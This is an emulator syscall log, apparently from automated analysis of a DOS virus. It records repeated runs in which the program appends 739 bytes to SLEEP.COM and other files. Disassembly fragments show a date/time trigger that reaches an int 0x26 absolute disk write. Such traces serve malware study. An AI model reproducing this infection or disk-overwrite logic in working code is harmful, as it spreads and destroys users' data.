2018-12-25T11:58:30.911817131Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:30.919825374Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:30.921727112Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:30.925787969Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:30.935099764Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:30.936580934Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:30.944928948Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:30.95433281Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:30.957317881Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:30.965700263Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:30.973271702Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:30.97502471Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:30.978466929Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:30.9883548Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:30.990043409Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:30.997454244Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:31.010965095Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:31.014755338Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:31.022625227Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:31.031634948Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:31.032876133Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:31.035566522Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:31.045146281Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:31.049061343Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:31.056596925Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:31.066352466Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:31.070544721Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:31.078078692Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:31.085384277Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:31.088358249Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:31.091662432Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:31.101998631Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:31.104531009Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:31.111521139Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:31.120576463Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:31.124212777Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:31.131186107Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:31.13794513Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:31.1402686Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:31.143190013Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:31.151644286Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:31.153004931Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:31.160168968Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:31.16953505Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:31.172240471Z 42 PC: 12ba1 | Get date
0x12ba1: cmp dl, 4
0x12ba4: jne 0x12bb0
0x12ba6: cmp dh, 7
0x12ba9: jne 0x12bb0
0x12bab: xor ax, ax
0x12bad: jmp 0x12bce
0x12baf: nop
0x12bb0: mov ah, 0x2c
0x12bb2: int 0x21
0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
2018-12-25T11:58:31.175296859Z 44 PC: 12bb4 | Get time
0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
0x12bcb: jne 0x12bce
0x12bcd: inc ax
0x12bce: mov dx, ax
0x12bd0: mov cx, 1
0x12bd3: xor bx, bx
0x12bd5: mov ah, 0x19
0x12bd7: int 0x21
0x12bd9: int 0x26
0x12bdb: mov bx, 0x31a
2018-12-25T11:58:31.17779007Z 25 PC: 12bd9 | Get default drive

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":6,"Min":0,"Second":0,"TimeBased":true,"OriginalID":6089,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:58:31.205069547Z 26 PC: 12aa5 | Set disk transfer address
2018-12-25T11:58:31.206969234Z 78 PC: 12afb | Find first file
2018-12-25T11:58:31.213719821Z 61 PC: 12b07 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:58:31.220173278Z 63 PC: 12b16 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:58:31.239927731Z 66 PC: 12b2d | Move file pointer
2018-12-25T11:58:31.241407506Z 64 PC: 12b41 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:58:31.244056313Z 64 PC: 12b4c | Write file or device (Write 739 bytes on handle 5)
2018-12-25T11:58:31.258563675Z 66 PC: 12b55 | Move file pointer
2018-12-25T11:58:31.260111826Z 64 PC: 12b73 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:58:31.267332714Z 62 PC: 12aef | Close file
2018-12-25T11:58:31.275717165Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:31.278464394Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:31.28497766Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:31.291514582Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:31.294339405Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:31.297192423Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:31.305420905Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:31.307805899Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:31.314270667Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:31.322347362Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:31.326032552Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:31.332672197Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:31.33914166Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:31.341248551Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:31.344308002Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:31.352153985Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:31.354129923Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:31.360489121Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:31.369106787Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:31.373412619Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:31.379924224Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:31.386160047Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:31.388678491Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:31.397006641Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:31.405211247Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:31.406846497Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:31.414044619Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:31.42231252Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:31.425120176Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:31.432230749Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:31.438789415Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:31.440105897Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:31.443759889Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:31.451526473Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:31.452850892Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:31.474505766Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:31.482615739Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:31.484961071Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:31.491729593Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:31.495611459Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:31.496485491Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:31.498921026Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:31.507211188Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:31.508257994Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:31.515229905Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:31.520490741Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:31.522136561Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:31.528677646Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:31.534765028Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:31.536037483Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:31.539277076Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:31.5472653Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:31.548663502Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:31.555074693Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:31.563028283Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:31.565253112Z 42 PC: 12ba1 | Get date
0x12ba1: cmp dl, 4
0x12ba4: jne 0x12bb0
0x12ba6: cmp dh, 7
0x12ba9: jne 0x12bb0
0x12bab: xor ax, ax
0x12bad: jmp 0x12bce
0x12baf: nop
0x12bb0: mov ah, 0x2c
0x12bb2: int 0x21
0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
2018-12-25T11:58:31.567591439Z 44 PC: 12bb4 | Get time
0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
0x12bcb: jne 0x12bce
0x12bcd: inc ax
0x12bce: mov dx, ax
0x12bd0: mov cx, 1
0x12bd3: xor bx, bx
0x12bd5: mov ah, 0x19
0x12bd7: int 0x21
0x12bd9: int 0x26
0x12bdb: mov bx, 0x31a
2018-12-25T11:58:31.569494696Z 44 PC: 12be2 | Get time
0x12be2: inc dh
0x12be4: cmp dh, byte ptr [0x319]
0x12be8: jl 0x12bf0
0x12bea: sub dh, byte ptr [0x319]
0x12bee: jmp 0x12be4
0x12bf0: mov al, dh
0x12bf2: mov cl, al
0x12bf4: cwde
0x12bf5: shl ax, 1
0x12bf7: add bx, ax
0x12bf9: mov si, word ptr [bx]
0x12bfb: mov ch, byte ptr [si - 1]
0x12bfe: mov dx, si
0x12c00: mov ah, 9
0x12c02: int 0x21
0x12c04: cmp ch, 0
0x12c07: jne 0x12c0b
0x12c09: int 0x20
0x12c0b: cmp ch, 1
0x12c0e: jne 0x12c11
2018-12-25T11:58:31.571408862Z 9 PC: 12c04 | Display string (Could not find end pointer)
2018-12-25T11:58:31.577370816Z 26 PC: 12ab9 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":6,"Min":0,"Second":0,"TimeBased":true,"OriginalID":6089,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:58:31.956539328Z 26 PC: 12aa5 | Set disk transfer address
2018-12-25T11:58:31.959792241Z 78 PC: 12afb | Find first file
2018-12-25T11:58:31.965608058Z 61 PC: 12b07 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:58:31.971970093Z 63 PC: 12b16 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:58:31.97850857Z 66 PC: 12b2d | Move file pointer
2018-12-25T11:58:31.979837336Z 64 PC: 12b41 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:58:31.982354955Z 64 PC: 12b4c | Write file or device (Write 739 bytes on handle 5)
2018-12-25T11:58:31.997911651Z 66 PC: 12b55 | Move file pointer
2018-12-25T11:58:31.999567941Z 64 PC: 12b73 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:58:32.005846308Z 62 PC: 12aef | Close file
2018-12-25T11:58:32.014019744Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:32.016757028Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:32.02302025Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:32.029099963Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:32.030899253Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:32.033399558Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:32.041098053Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:32.04279366Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:32.049125015Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:32.057338987Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:32.061056082Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:32.067249976Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:32.073468683Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:32.080969497Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:32.083570254Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:32.091160666Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:32.093054558Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:32.099883832Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:32.107688796Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:32.11054901Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:32.116795782Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:32.122876634Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:32.124671121Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:32.127157896Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:32.135105102Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:32.136758788Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:32.143067031Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:32.150746511Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:32.153564104Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:32.159911444Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:32.166120597Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:32.168341215Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:32.17095661Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:32.178944669Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:32.180671557Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:32.187136839Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:32.195572576Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:32.198248345Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:32.204722131Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:32.210741822Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:32.21227627Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:32.214783372Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:32.223368148Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:32.225222992Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:32.231552187Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:32.239506798Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:32.242354488Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:32.248728388Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:32.255254664Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:32.256729823Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:32.259605086Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:32.267115122Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:32.268370558Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:32.275072801Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:32.283066521Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:32.285413936Z 42 PC: 12ba1 | Get date
0x12ba1: cmp dl, 4
0x12ba4: jne 0x12bb0
0x12ba6: cmp dh, 7
0x12ba9: jne 0x12bb0
0x12bab: xor ax, ax
0x12bad: jmp 0x12bce
0x12baf: nop
0x12bb0: mov ah, 0x2c
0x12bb2: int 0x21
0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
2018-12-25T11:58:32.287651512Z 44 PC: 12bb4 | Get time
0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
0x12bcb: jne 0x12bce
0x12bcd: inc ax
0x12bce: mov dx, ax
0x12bd0: mov cx, 1
0x12bd3: xor bx, bx
0x12bd5: mov ah, 0x19
0x12bd7: int 0x21
0x12bd9: int 0x26
0x12bdb: mov bx, 0x31a
2018-12-25T11:58:32.289700614Z 44 PC: 12be2 | Get time
0x12be2: inc dh
0x12be4: cmp dh, byte ptr [0x319]
0x12be8: jl 0x12bf0
0x12bea: sub dh, byte ptr [0x319]
0x12bee: jmp 0x12be4
0x12bf0: mov al, dh
0x12bf2: mov cl, al
0x12bf4: cwde
0x12bf5: shl ax, 1
0x12bf7: add bx, ax
0x12bf9: mov si, word ptr [bx]
0x12bfb: mov ch, byte ptr [si - 1]
0x12bfe: mov dx, si
0x12c00: mov ah, 9
0x12c02: int 0x21
0x12c04: cmp ch, 0
0x12c07: jne 0x12c0b
0x12c09: int 0x20
0x12c0b: cmp ch, 1
0x12c0e: jne 0x12c11
2018-12-25T11:58:32.309151399Z 9 PC: 12c04 | Display string (Could not find end pointer)
2018-12-25T11:58:32.314142083Z 26 PC: 12ab9 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":6,"Min":0,"Second":0,"TimeBased":true,"OriginalID":6089,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:58:32.156580385Z 26 PC: 12aa5 | Set disk transfer address
2018-12-25T11:58:32.157942951Z 78 PC: 12afb | Find first file
2018-12-25T11:58:32.165393632Z 61 PC: 12b07 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:58:32.17244356Z 63 PC: 12b16 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:58:32.179378398Z 66 PC: 12b2d | Move file pointer
2018-12-25T11:58:32.183782776Z 64 PC: 12b41 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:58:32.186778025Z 64 PC: 12b4c | Write file or device (Write 739 bytes on handle 5)
2018-12-25T11:58:32.202468242Z 66 PC: 12b55 | Move file pointer
2018-12-25T11:58:32.204738401Z 64 PC: 12b73 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:58:32.212004854Z 62 PC: 12aef | Close file
2018-12-25T11:58:32.22104706Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:32.228656743Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:32.236252666Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:32.241223379Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:32.242869706Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:32.246254346Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:32.260701124Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:32.262219865Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:32.269643183Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:32.279547913Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:32.282544322Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:32.291078693Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:32.298395441Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:32.300161162Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:32.304177413Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:32.312991692Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:32.314513928Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:32.322882481Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:32.332403479Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:32.335647681Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:32.346304419Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:32.353615029Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:32.355847065Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:32.359489247Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:32.368312934Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:32.369898733Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:32.377836087Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:32.386788524Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:32.38978407Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:32.397460792Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:32.404367573Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:32.405686674Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:32.409466947Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:32.418318948Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:32.419672753Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:32.425566642Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:32.436559092Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:32.439823591Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:32.448097995Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:32.455688073Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:32.457219249Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:32.460145375Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:32.470855966Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:32.472296828Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:32.479360202Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:32.488972123Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:32.491802263Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:32.498825218Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:32.508620535Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:32.510135989Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:32.512951117Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:32.521822528Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:32.523243652Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:32.530112418Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:32.53968771Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:32.542416368Z 42 PC: 12ba1 | Get date
0x12ba1: cmp dl, 4
0x12ba4: jne 0x12bb0
0x12ba6: cmp dh, 7
0x12ba9: jne 0x12bb0
0x12bab: xor ax, ax
0x12bad: jmp 0x12bce
0x12baf: nop
0x12bb0: mov ah, 0x2c
0x12bb2: int 0x21
0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
2018-12-25T11:58:32.544761402Z 44 PC: 12bb4 | Get time
0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
0x12bcb: jne 0x12bce
0x12bcd: inc ax
0x12bce: mov dx, ax
0x12bd0: mov cx, 1
0x12bd3: xor bx, bx
0x12bd5: mov ah, 0x19
0x12bd7: int 0x21
0x12bd9: int 0x26
0x12bdb: mov bx, 0x31a
2018-12-25T11:58:32.547156749Z 44 PC: 12be2 | Get time
0x12be2: inc dh
0x12be4: cmp dh, byte ptr [0x319]
0x12be8: jl 0x12bf0
0x12bea: sub dh, byte ptr [0x319]
0x12bee: jmp 0x12be4
0x12bf0: mov al, dh
0x12bf2: mov cl, al
0x12bf4: cwde
0x12bf5: shl ax, 1
0x12bf7: add bx, ax
0x12bf9: mov si, word ptr [bx]
0x12bfb: mov ch, byte ptr [si - 1]
0x12bfe: mov dx, si
0x12c00: mov ah, 9
0x12c02: int 0x21
0x12c04: cmp ch, 0
0x12c07: jne 0x12c0b
0x12c09: int 0x20
0x12c0b: cmp ch, 1
0x12c0e: jne 0x12c11
2018-12-25T11:58:32.550254727Z 9 PC: 12c04 | Display string (Could not find end pointer)
2018-12-25T11:58:32.556439627Z 26 PC: 12ab9 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":6,"Min":0,"Second":0,"TimeBased":true,"OriginalID":6089,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:58:32.20371014Z 26 PC: 12aa5 | Set disk transfer address
2018-12-25T11:58:32.211173074Z 78 PC: 12afb | Find first file
2018-12-25T11:58:32.217723076Z 61 PC: 12b07 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:58:32.229212236Z 63 PC: 12b16 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:58:32.236278153Z 66 PC: 12b2d | Move file pointer
2018-12-25T11:58:32.241505775Z 64 PC: 12b41 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:58:32.244601725Z 64 PC: 12b4c | Write file or device (Write 739 bytes on handle 5)
2018-12-25T11:58:32.261200832Z 66 PC: 12b55 | Move file pointer
2018-12-25T11:58:32.264070686Z 64 PC: 12b73 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:58:32.271391578Z 62 PC: 12aef | Close file
2018-12-25T11:58:32.280250806Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:32.283867635Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:32.291110392Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:32.297987299Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:32.300766416Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:32.304266969Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:32.314636359Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:32.322513238Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:32.330385872Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:32.339468707Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:32.342322872Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:32.351451031Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:32.358650791Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:32.360132989Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:32.364676144Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:32.374281791Z 66 PC: 12b55 | Move file pointer (See above)
